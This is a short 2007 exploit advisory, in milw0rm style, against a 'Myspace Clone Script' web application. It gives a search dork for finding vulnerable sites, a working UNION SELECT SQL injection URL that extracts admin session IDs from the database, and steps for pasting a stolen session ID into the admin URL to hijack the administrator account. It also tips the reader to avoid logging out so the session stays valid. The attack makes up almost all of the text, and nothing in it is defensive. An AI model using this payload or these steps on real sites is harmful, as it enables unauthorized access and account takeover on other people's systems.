39 lines
No EOL
1.2 KiB
Text
39 lines
No EOL
1.2 KiB
Text
--==+================================================================================+==--
|
|
--==+ Myspace Clone Script SQL Injection Vulnerabilitys +==--
|
|
--==+================================================================================+==--
|
|
|
|
|
|
|
|
AUTHOR: t0pP8uZz & xprog
|
|
SITE: datecomm.com
|
|
DORK (altavista.com): "Search | Invite | Mail | Blog | Forum"
|
|
|
|
|
|
DESCRIPTION:
|
|
pull admin session id's from the database, then visit admin area.
|
|
|
|
|
|
EXPLOITS:
|
|
index.php?pg=forums&s=viewcat&seid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,sess_id,7,8,9,10/**/FROM/**/admin/*
|
|
|
|
|
|
NOTE/TIP:
|
|
after executing the Injection you will see a SessionID.
|
|
|
|
Use the session id in the below URL:
|
|
admin.php?pg=users&adsess=SESSION_ID
|
|
|
|
example:
|
|
http://www.site.com/admin.php?pg=users&adsess=54f824ebcde36ee8844c103d97412123
|
|
|
|
Do Not Click Logout! as it will delete the sessionid from the DB.
|
|
|
|
|
|
GREETZ: milw0rm.com, H4CK-Y0u.org!
|
|
|
|
|
|
--==+================================================================================+==--
|
|
--==+ Myspace Clone Script SQL Injection Vulnerabilitys +==--
|
|
--==+================================================================================+==--
|
|
|
|
# milw0rm.com [2007-11-13] |